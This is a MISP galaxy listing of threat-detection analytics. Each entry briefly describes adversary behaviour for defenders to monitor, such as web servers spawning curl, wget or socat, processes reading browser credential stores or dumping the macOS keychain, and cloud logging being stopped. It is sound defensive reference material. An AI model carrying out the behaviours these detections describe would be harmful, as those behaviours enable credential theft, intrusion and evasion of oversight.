Internal MISP references

UUID 3154acf3-a5df-40bd-b4bc-3a210b6e5e0e which can be used as unique global reference for Analytic 0501 - AN0501 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0501
mitre_platforms ['Identity Provider']

Analytic 0015 - AN0015

From a defender’s perspective, suspicious bridging is observed when network devices begin allowing traffic that contradicts existing segmentation or access policies. Observable behaviors include sudden modifications to ACLs or firewall rules, unusual cross-boundary traffic flows (e.g., east-west communications across separated VLANs), or simultaneous ingress/egress anomalies. Multi-event correlation is key: configuration changes on a router/firewall followed by unexpected traffic patterns, especially from unusual sources, is a strong indicator of compromise.

Internal MISP references

UUID 32d56b42-ff83-46d2-aeea-57a6958d3e83 which can be used as unique global reference for Analytic 0015 - AN0015 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0015
mitre_platforms ['Network Devices']

Analytic 1500 - AN1500

Encrypted sessions detected with asymmetric key exchange anomalies on non-standard ports or with invalid/malformed certs. Defender correlates NetFlow/IPFIX with IDS/IPS detecting RSA exchanges outside expected TLS flows.

Internal MISP references

UUID 3e5930bf-6d79-4f75-9b9e-97cad9bf9232 which can be used as unique global reference for Analytic 1500 - AN1500 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1500
mitre_platforms ['Network Devices']

Analytic 0510 - AN0510

Detection correlates file creation or modification of .lnk (shortcut) files in autostart locations with anomalous parent-child process lineage or unsigned binaries. Defenders should watch for LNK creation/modification events outside of known software installations, patch events, or OS updates. Flag shortcut targets pointing to suspicious locations or unknown binaries, particularly those written by script interpreters or spawned from phishing delivery chains.

Internal MISP references

UUID 5f9fdff8-55ed-4b1e-8889-46b376ce7149 which can be used as unique global reference for Analytic 0510 - AN0510 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0510
mitre_platforms ['Windows']

Analytic 0051 - AN0051

Correlated modification of AppCompat registry keys and execution of sdbinst.exe to install custom shim databases. Followed by DLL injection via shim behavior into target application processes.

Internal MISP references

UUID 8fcdd234-c8d8-4d95-b381-91c92cb319b6 which can be used as unique global reference for Analytic 0051 - AN0051 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0051
mitre_platforms ['Windows']

Analytic 1050 - AN1050

Execution of AppleScript, bash, or launchd jobs that invoke delay functions (e.g., sleep, delay in AppleScript) with limited parent interaction and staged follow-on commands.

Internal MISP references

UUID 94871740-e9ae-458a-9d09-ef0f58c05905 which can be used as unique global reference for Analytic 1050 - AN1050 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1050
mitre_platforms ['macOS']

Analytic 1005 - AN1005

Repeated SSH, VPN, or RDP gateway authentication attempts from external IPs → subsequent successful logon → remote shell or lateral movement activity (e.g., scp/sftp).

Internal MISP references

UUID a3bca3ec-fd25-4b9d-bbce-9575ba96b8ef which can be used as unique global reference for Analytic 1005 - AN1005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1005
mitre_platforms ['Linux']

Analytic 0105 - AN0105

Detects unauthorized access to web browser credential stores (e.g., Chrome Login Data, Edge Credential Locker) by processes other than the browser itself. Correlates file reads of credential databases with subsequent API calls to CryptUnprotectData or memory inspection attempts.

Internal MISP references

UUID c4eb93f1-0288-4884-bdbc-800e7a8e87c3 which can be used as unique global reference for Analytic 0105 - AN0105 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0105
mitre_platforms ['Windows']

Analytic 0061 - AN0061

Adversary disables or stops critical services (e.g., Exchange, SQL, AV, endpoint monitoring) using native utilities or API calls, often preceding destructive actions (T1485, T1486). Behavioral chain: Elevated execution context + stop-service or sc.exe or ChangeServiceConfigW + terminated or disabled service + possible follow-up file manipulation.

Internal MISP references

UUID 00449d4c-48c7-4977-bf38-86fbc4e79285 which can be used as unique global reference for Analytic 0061 - AN0061 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0061
mitre_platforms ['Windows']

Analytic 1006 - AN1006

Unexpected inbound or outbound VNC/SSH/Screen Sharing connections from external sources → repeated failed logins followed by success → remote interactive sessions or abnormal file transfers.

Internal MISP references

UUID 14f4930e-a2a5-45ae-9552-837c0a35e06b which can be used as unique global reference for Analytic 1006 - AN1006 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1006
mitre_platforms ['macOS']

Analytic 1060 - AN1060

Detects lateral discovery or container breakout attempts using netcat, curl, or custom binaries probing other services within the same namespace or VPC subnet.

Internal MISP references

UUID 5d7b1be3-1c8a-40bf-a4d2-85e26dd82d76 which can be used as unique global reference for Analytic 1060 - AN1060 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1060
mitre_platforms ['Containers']

Analytic 0160 - AN0160

Detection of a process or script that accesses a common web service to retrieve content containing obfuscated indicators of a secondary C2 server (dead drop resolver behavior).

Internal MISP references

UUID 671050c7-7e86-4be7-9ab4-aa9c763fad44 which can be used as unique global reference for Analytic 0160 - AN0160 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0160
mitre_platforms ['macOS']

Analytic 0601 - AN0601

Detection of Mach-O binaries or AppleScripts that contain nested, encoded, or run-only embedded payloads dropped at runtime.

Internal MISP references

UUID 8cd6ae3d-7f14-42bf-9aff-870209fc333f which can be used as unique global reference for Analytic 0601 - AN0601 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0601
mitre_platforms ['macOS']

Analytic 0016 - AN0016

Adversary uses nltest, PowerShell, or Win32/.NET API to enumerate domain trust relationships (via DSEnumerateDomainTrusts, GetAllTrustRelationships, or LDAP queries), followed by discovery or authentication staging.

Internal MISP references

UUID c3be6c4a-3b3d-4a37-a1d8-2c4df915a7aa which can be used as unique global reference for Analytic 0016 - AN0016 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0016
mitre_platforms ['Windows']

Analytic 0106 - AN0106

Detects attempts to access browser credential stores (e.g., Firefox logins.json, Chrome SQLite DB) or processes (e.g., gnome-keyring-daemon). Observes unauthorized file reads and memory inspection of browser processes using ptrace or gdb.

Internal MISP references

UUID e11709c9-0203-4f76-bbfb-379ed36723ce which can be used as unique global reference for Analytic 0106 - AN0106 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0106
mitre_platforms ['Linux']

Analytic 0610 - AN0610

Adversary manipulation of shared library paths, environment variables, or replacement of service binaries. Defender observes suspicious modifications in /etc/ld.so.preload, service config changes, or file writes replacing existing executables.

Internal MISP references

UUID e21542c4-8df8-4c9e-8b1d-2c9bbe058386 which can be used as unique global reference for Analytic 0610 - AN0610 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0610
mitre_platforms ['Linux']

Analytic 1600 - AN1600

Curl, wget, or custom HTTP clients initiated by uncommon user accounts or cron jobs to popular web services, with no observed response parsing logic.

Internal MISP references

UUID e83afa89-0ec1-49e7-b351-eef67b085480 which can be used as unique global reference for Analytic 1600 - AN1600 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1600
mitre_platforms ['Linux']

Analytic 1007 - AN1007

Connections to exposed container services (e.g., Docker API, Kubernetes API server) from unauthorized external IPs → abnormal container creation/start → lateral activity within cluster nodes.

Internal MISP references

UUID 04fcf3d4-4547-4e64-bbb7-9faa46dda1f6 which can be used as unique global reference for Analytic 1007 - AN1007 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1007
mitre_platforms ['Containers']

Analytic 0107 - AN0107

Detects abnormal access to Safari credential stores (Keychain-backed) or Chrome/Firefox login databases. Observes processes executing security dump-keychain or directly reading credential files in ~/Library/Application Support. Correlates file access with suspicious process ancestry or unsigned binaries.

Internal MISP references

UUID 1a068df0-67d4-4521-aeda-75fa8e9f8d98 which can be used as unique global reference for Analytic 0107 - AN0107 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0107
mitre_platforms ['macOS']

Analytic 0710 - AN0710

Suspicious reuse of SSH agent sockets across multiple users or processes, anomalous access to ~/.ssh/ or /tmp/ssh-* sockets, and abnormal patterns of lateral movement via SSH without new authentication events. Defender view: detect when one process accesses another user's SSH agent or when an existing SSH connection is used to pivot unexpectedly.

Internal MISP references

UUID 3517708a-f80e-4335-a122-65b9b3505e8d which can be used as unique global reference for Analytic 0710 - AN0710 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0710
mitre_platforms ['Linux']

Analytic 0170 - AN0170

Detects modification of registry keys used for default file handlers, followed by anomalous process execution from user-initiated file opens. This includes tracking changes under HKCU and HKCR for file extension mappings, and correlating them with new or suspicious handler paths launching unusual child processes (e.g., PowerShell, cmd, wscript).

Internal MISP references

UUID 3ac58f14-32d6-4ce2-8aa7-e7c429dd6405 which can be used as unique global reference for Analytic 0170 - AN0170 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0170
mitre_platforms ['Windows']

Analytic 0701 - AN0701

Detects the creation or modification of .service unit files in system/user-level directories, combined with execution of systemctl, service, or dynamically created drop-ins via systemd generators. Detects persistence by analyzing the ExecStart path, file entropy, and symlink usage, especially when paired with execution from /tmp, /dev/shm, or unmounted volumes.

Internal MISP references

UUID 4da5660a-3b1c-4b4d-ad79-991bef456b20 which can be used as unique global reference for Analytic 0701 - AN0701 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0701
mitre_platforms ['Linux']

Analytic 1070 - AN1070

Adversaries collecting local files via PowerShell, WMI, or direct file API calls often include recursive file listings, targeted file reads, and temporary file staging.

Internal MISP references

UUID 79ecfad5-3439-4a04-919a-236d47652ba0 which can be used as unique global reference for Analytic 1070 - AN1070 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1070
mitre_platforms ['Windows']

Analytic 0017 - AN0017

Cloud login from atypical geolocation or user-agent string, followed by resource enumeration or infrastructure manipulation using cloud CLI/API

Internal MISP references

UUID 7d4732f8-989c-4425-81c4-aa3e1bcb8d0e which can be used as unique global reference for Analytic 0017 - AN0017 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0017
mitre_platforms ['IaaS']

Analytic 0071 - AN0071

Abuse of trusted Electron apps (Teams, Slack, Chrome) to spawn child processes or execute payloads via malicious command-line arguments (e.g., --gpu-launcher) and modified app resources (.asar). Behavior chain: suspicious parent process (Electron app) → unusual command-line args → child process creation → optional DLL/network artifacts.

Internal MISP references

UUID dc0bf4ca-1d65-46ee-b4b1-d8f73a6e0cda which can be used as unique global reference for Analytic 0071 - AN0071 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0071
mitre_platforms ['Windows']

Analytic 1700 - AN1700

Network traffic analysis may reveal processes communicating with malicious domains.

Internal MISP references

UUID 71fc481d-53f9-4a35-9879-e01e17f425f0 which can be used as unique global reference for Analytic 1700 - AN1700 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1700
mitre_platforms ['iOS']

Analytic 0081 - AN0081

User-initiated processes generating sustained outbound traffic over common or non-standard ports, often outside business hours, potentially linked to scanning or proxyjacking. Includes curl, wget, masscan, or proxy clients.

Internal MISP references

UUID 10e9d109-0a17-41cd-9d0b-67c679bc94b7 which can be used as unique global reference for Analytic 0081 - AN0081 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0081
mitre_platforms ['Linux']

Analytic 1008 - AN1008

Detect abnormally high volume of inbound email messages or repetitive attachments being delivered to a single mailbox within a short time window. Defenders should look for anomalous spikes in message counts and repetitive attachment file creation events correlated with targeted users.

Internal MISP references

UUID 1f515cf2-91a5-4bed-95a1-ed8fc8b24a87 which can be used as unique global reference for Analytic 1008 - AN1008 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1008
mitre_platforms ['Windows']

Analytic 0180 - AN0180

Behavioral chain: (1) Safari/Chrome/Firefox/Office handles a URL; unified logs show open/click or LSQuarantine assignment, (2) outbound connection to untrusted domain, (3) a new file appears in ~/Downloads or /private/var/folders/* with quarantine flag.

Internal MISP references

UUID 3f615721-c62f-4229-9c6e-cb873b2591e5 which can be used as unique global reference for Analytic 0180 - AN0180 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0180
mitre_platforms ['macOS']

Analytic 0108 - AN0108

Executables written or modified in installer directories (e.g., %TEMP% subdirectories or Program Files installer paths) followed by execution under elevated context. Defender observes abnormal file replacement activity, process creation by installer processes pointing to attacker-supplied binaries, and unexpected module loads in elevated processes.

Internal MISP references

UUID 4f132f21-1287-4fc2-a13e-d7770d856610 which can be used as unique global reference for Analytic 0108 - AN0108 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0108
mitre_platforms ['Windows']

Analytic 0810 - AN0810

Detects login to admin consoles (e.g., Microsoft 365 Admin Center) from unrecognized users, devices, or geolocations followed by non-API data review or configuration read actions that suggest GUI dashboard use.

Internal MISP references

UUID a0bfcae2-1936-466d-91b4-f72fcae730b6 which can be used as unique global reference for Analytic 0810 - AN0810 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0810
mitre_platforms ['Office Suite']

Analytic 0801 - AN0801

Cloud API events where logging services are stopped, deleted, or modified in a way that disables audit visibility. Defender view: unauthorized StopLogging, DeleteTrail, or UpdateSink operations correlated with privileged user activity.

Internal MISP references

UUID a788e3ed-8faf-4443-bb26-fd530ca930d1 which can be used as unique global reference for Analytic 0801 - AN0801 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0801
mitre_platforms ['IaaS']

Analytic 0018 - AN0018

Federated login using SSO or OAuth grant to cloud control plane, followed by directory or permissions enumeration

Internal MISP references

UUID ecb9db5c-55ef-48df-8ccb-f57db8c32a08 which can be used as unique global reference for Analytic 0018 - AN0018 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0018
mitre_platforms ['Identity Provider']

Analytic 1080 - AN1080

Monitors for the creation of accounts inside containers using names that resemble legitimate orchestrator or backup identities to mask adversary persistence.

Internal MISP references

UUID fb767270-25ad-4fea-a8e7-8f9c57ac1fa8 which can be used as unique global reference for Analytic 1080 - AN1080 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1080
mitre_platforms ['Containers']

Analytic 1800 - AN1800

Mobile threat defense agents could detect unauthorized operating system modifications by using attestation.

Internal MISP references

UUID 90052e39-40c3-4194-a2a2-fc240639ab0f which can be used as unique global reference for Analytic 1800 - AN1800 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1800
mitre_platforms ['Android']

Analytic 1090 - AN1090

Access to organizational directories via Google Workspace Directory API, Slack SCIM, or Okta SCIM by apps or identities outside normal roles.

Internal MISP references

UUID 089d588f-a6aa-4083-a900-ebcae97b5bfa which can be used as unique global reference for Analytic 1090 - AN1090 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1090
mitre_platforms ['SaaS']

Analytic 0190 - AN0190

Detection of phishing through anomalous Mail app activity, such as attachments saved to disk and immediately executed, or Safari/Preview launching URLs and files linked from email messages. Correlate UnifiedLogs events with subsequent process execution.

Internal MISP references

UUID 2a0cc1a9-db3b-4f05-8c85-29d69507418b which can be used as unique global reference for Analytic 0190 - AN0190 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0190
mitre_platforms ['macOS']

Analytic 1009 - AN1009

Monitor mail server logs (e.g., Postfix, Sendmail) for excessive connections or inbound message counts targeting a single recipient. Correlate with repetitive attachment storage in /var/mail or /var/spool/mail directories.

Internal MISP references

UUID 31e4c4dc-3094-45b2-9d4d-1b0bf8311498 which can be used as unique global reference for Analytic 1009 - AN1009 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN1009
mitre_platforms ['Linux']

Analytic 0091 - AN0091

Suspicious use of attrib.exe or PowerShell commands to set hidden attributes on files/directories. Defender view: processes modifying file attributes to 'hidden' or creating files with ADS (alternate data streams).

Internal MISP references

UUID 4ea80ec4-bfcc-4bd6-b986-aa2c9fe2d8d6 which can be used as unique global reference for Analytic 0091 - AN0091 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0091
mitre_platforms ['Windows']

Analytic 0910 - AN0910

Execution of QEMU, KVM, or VirtualBox processes with unusual flags (e.g., '-nographic', '-snapshot'). File creation of VM images in atypical directories. Defender view: monitoring audit logs for process executions and file modifications linked to hidden virtualization.

Internal MISP references

UUID 79ba9430-eeb0-4fce-9757-bb81fc2a43d5 which can be used as unique global reference for Analytic 0910 - AN0910 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0910
mitre_platforms ['Linux']

Analytic 0109 - AN0109

Correlate high-frequency or anomalous DNS query activity with processes that do not normally generate network requests (e.g., Office apps, system utilities). Detect pseudo-random or high-entropy domain lookups indicative of domain generation algorithms (DGAs).

Internal MISP references

UUID 7cf1b4ad-95e8-4bf0-8b2f-fc3c14938656 which can be used as unique global reference for Analytic 0109 - AN0109 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0109
mitre_platforms ['Windows']

Analytic 0019 - AN0019

Login to M365 or Google Workspace from CLI tools or unexpected source IPs, followed by mailbox or document access

Internal MISP references

UUID c85d0aea-06c4-4b0f-8552-0d0873394ffa which can be used as unique global reference for Analytic 0019 - AN0019 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0019
mitre_platforms ['Office Suite']

Analytic 0901 - AN0901

Adversaries create SaaS accounts via admin dashboards or integrations (e.g., Zoom, Salesforce, Slack). Monitor lifecycle.create or account provisioning events from non-standard sources or times.

Internal MISP references

UUID e619c27e-3d57-489c-8ce9-cbb5f0c195bd which can be used as unique global reference for Analytic 0901 - AN0901 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0901
mitre_platforms ['SaaS']

Analytic 0202 - AN0202

Session cookie reuse on unmanaged browsers, devices, or client types deviating from user baseline (e.g., switching from Chrome to curl).

Internal MISP references

UUID 32ace35c-66c4-48d7-a8bc-d81c65f4451b which can be used as unique global reference for Analytic 0202 - AN0202 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0202
mitre_platforms ['SaaS']

Analytic 2002 - AN2002

Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service). Monitor and analyze traffic patterns and packet inspection associated to protocol(s), leveraging SSL/TLS inspection for encrypted traffic, that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)).

Internal MISP references

UUID 51133710-7c09-4eb5-a0bc-6fc5338cd68d which can be used as unique global reference for Analytic 2002 - AN2002 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2002
mitre_platforms ['PRE']

Analytic 0022 - AN0022

Developer or CI invokes package managers/compilers (apt/yum + build-essential, npm/yarn/pnpm, pip/pip3, gem, cargo, go, maven/gradle). These write executable or script files into PATH or project dirs and immediately execute embedded lifecycle hooks (preinstall/postinstall, setup.py, npm scripts) that spawn shells or curl/wget, followed by egress to unfamiliar registries or domains.

Internal MISP references

UUID 9e95639e-633f-47cf-b343-3ea771c19192 which can be used as unique global reference for Analytic 0022 - AN0022 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0022
mitre_platforms ['Linux']

Analytic 0220 - AN0220

Adversary exploits Apache/Nginx/app servers. Chain: (1) suspicious requests in access logs → (2) spike of 5xx or WAF blocks → (3) web server or interpreter (apache2/nginx/php-fpm/node/python) spawns /bin/sh, curl, wget, socat, or writes webshell → (4) outbound callback.

Internal MISP references

UUID a4ce8f28-db09-4b0d-bb8d-a77ba3cef3c0 which can be used as unique global reference for Analytic 0220 - AN0220 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0220
mitre_platforms ['Linux']

Analytic 2020 - AN2020

Internet scanners may be used to look for patterns associated with malicious content designed to collect host software information from visitors.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: ATT ScanBox) Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.

Internal MISP references

UUID da8a7d00-6f8a-4bc6-9863-3a434c9d36c1 which can be used as unique global reference for Analytic 2020 - AN2020 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2020
mitre_platforms ['PRE']

Analytic 0032 - AN0032

Previously unseen applications generating outbound connections with atypical data flow characteristics, such as excessive data with no return response.

Internal MISP references

UUID 0519edaf-6485-40b2-8b91-13db29fb8cb8 which can be used as unique global reference for Analytic 0032 - AN0032 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0032
mitre_platforms ['macOS']

Analytic 2030 - AN2030

A process with no prior history or outside of known whitelisted tools initiates file or registry modifications to configure exclusion rules for antivirus, backup, or file-handling systems. Or a file system enumeration for specific file names andcritical extensions like .dll, .exe, .sys, or specific directories such as 'Program Files' or security tool paths or system component discovery for the exclusion of the files or components.

Internal MISP references

UUID 098f0607-df17-4291-a1b1-a8e3374c075a which can be used as unique global reference for Analytic 2030 - AN2030 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2030
mitre_platforms ['Windows']

Analytic 0023 - AN0023

Developer tools (Homebrew, pip, npm/yarn, Xcode builds) install or update dependencies; new Mach-O or scripts appear under /usr/local, /opt/homebrew, ~/Library/Application Support, project dirs (node_modules/.bin, venv/bin). First run spawns sh/zsh/osascript/curl and new outbound flows; Gatekeeper/AMFI may flag unsigned components.

Internal MISP references

UUID 0f186e7f-fe33-45d6-ba1e-02a334cf1cb3 which can be used as unique global reference for Analytic 0023 - AN0023 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0023
mitre_platforms ['macOS']

Analytic 0203 - AN0203

Web session tokens reused in native Office apps (e.g., Outlook, Teams) without associated token refresh or login behavior on the endpoint.

Internal MISP references

UUID 126cff4b-4ba7-4464-bfc8-4daabed5e05b which can be used as unique global reference for Analytic 0203 - AN0203 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0203
mitre_platforms ['Office Suite']

Analytic 2003 - AN2003

Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control. Once adversaries have provisioned a server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)

Internal MISP references

UUID 8ad0cc97-4f6e-4ea0-a930-3fdb6b0df819 which can be used as unique global reference for Analytic 2003 - AN2003 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2003
mitre_platforms ['PRE']

Analytic 0230 - AN0230

Adversary leverages root or sudo access to alter system banners, web content directories (e.g., /var/www/html), or login configurations (/etc/issue). File creation or overwrites may coincide with suspicious script execution or cron job activity.

Internal MISP references

UUID 8ba0c3e2-9544-47d1-9738-757c35dc19fa which can be used as unique global reference for Analytic 0230 - AN0230 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0230
mitre_platforms ['Linux']

Analytic 0320 - AN0320

Inbound spearphishing attempts delivered via third-party services (e.g., Gmail, LinkedIn messages) leading to malicious file downloads or browser-initiated script execution. Defender view includes correlation of external service logins, unexpected file write operations, and suspicious descendant processes spawned from productivity or browser applications.

Internal MISP references

UUID c83f1d8c-ba54-4f2d-91b8-3006a2180497 which can be used as unique global reference for Analytic 0320 - AN0320 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0320
mitre_platforms ['Windows']

Analytic 0302 - AN0302

Atypical processes (e.g., powershell.exe, regsvr32.exe) encode large outbound traffic using Base64 or other character encodings; this traffic is sent over uncommon ports or embedded in protocol fields (e.g., HTTP cookies or headers).

Internal MISP references

UUID f979bacd-580c-4948-b501-c42dd4a8cb92 which can be used as unique global reference for Analytic 0302 - AN0302 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0302
mitre_platforms ['Windows']

Analytic 2004 - AN2004

Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time. Monitor for contextual data about a malicious payload, such as compilation times, file hashes, as well as watermarks or other identifiable configuration information. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.

Internal MISP references

UUID 2a3b0030-05b4-4b85-a33c-dda07472f31f which can be used as unique global reference for Analytic 2004 - AN2004 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2004
mitre_platforms ['PRE']

Analytic 0042 - AN0042

Detects files collected into user temp or shared directories followed by compression with ditto, zip, or custom scripts.

Internal MISP references

UUID 313de6ca-629b-4f77-b58f-5cf7b490a62e which can be used as unique global reference for Analytic 0042 - AN0042 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0042
mitre_platforms ['macOS']

Analytic 0402 - AN0402

Launchd jobs or user processes invoking symmetric crypto APIs from the Security framework and generating outbound connections carrying randomized payloads inconsistent with normal TLS patterns.

Internal MISP references

UUID 531ba452-e3b8-4064-be28-31ddd13b3478 which can be used as unique global reference for Analytic 0402 - AN0402 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0402
mitre_platforms ['macOS']

Analytic 0420 - AN0420

Forged SAML tokens may be used on Windows systems to authenticate to federated apps without normal Kerberos activity. Defenders may detect anomalous event correlation, where access to SaaS/O365 via SAML occurs without prior TGT requests or user logons.

Internal MISP references

UUID 5d2820b1-af59-4ca2-9f9e-b5bc76f55395 which can be used as unique global reference for Analytic 0420 - AN0420 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0420
mitre_platforms ['Windows']

Analytic 0024 - AN0024

Correlates unexpected modifications to WMI event filters, scheduled task triggers, or registry autorun keys with subsequent execution of non-standard binaries by SYSTEM-level processes.

Internal MISP references

UUID 9418d7e2-666f-4f73-9ac7-96b32005e9b7 which can be used as unique global reference for Analytic 0024 - AN0024 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0024
mitre_platforms ['Windows']

Analytic 0204 - AN0204

Anomalous process (e.g., rundll32, svchost, cmd) initiates connections to internal peer hosts not seen in typical communication baselines, used to proxy or forward traffic internally, often using SMB, RPC, or high ports.

Internal MISP references

UUID ca56c2df-0338-4325-964a-0f775d986277 which can be used as unique global reference for Analytic 0204 - AN0204 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0204
mitre_platforms ['Windows']

Analytic 0240 - AN0240

Defender observes execution of commands like tasklist, sc query, reg query, or PowerShell WMI/Registry queries targeting known backup products (e.g., Veeam, Acronis, CrashPlan). Behavior often includes parent-child lineage involving PowerShell or cmd.exe with discovery syntax, and enumeration of services, directories, or registry paths tied to backup software.

Internal MISP references

UUID dbc6d9ca-9502-46a0-a59b-15b050bb539c which can be used as unique global reference for Analytic 0240 - AN0240 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0240
mitre_platforms ['Windows']

Analytic 2005 - AN2005

Monitor and analyze traffic patterns and packet inspection associated to protocol(s) that do not follow the expected protocol standards and traffic flows (e.g extraneous packets that do not belong to established flows, gratuitous or anomalous traffic patterns, anomalous syntax, or structure). Consider correlation with process monitoring and command line to detect anomalous processes execution and command line arguments associated to traffic patterns (e.g. monitor anomalies in use of files that do not normally initiate connections for respective protocol(s)). Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization. Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: Phishing).

Internal MISP references

UUID 2eb3d192-6e04-4e42-af63-ed3f54f65285 which can be used as unique global reference for Analytic 2005 - AN2005 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN2005
mitre_platforms ['PRE']

Analytic 0520 - AN0520

Monitors sequences involving deletion/modification of logs, registry keys, scheduled tasks, or prefetch files following suspicious process activity or elevated access escalation.

Internal MISP references

UUID 4416c78b-902b-4baa-9a5d-26f0b7e5d78d which can be used as unique global reference for Analytic 0520 - AN0520 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0520
mitre_platforms ['Windows']

Analytic 0250 - AN0250

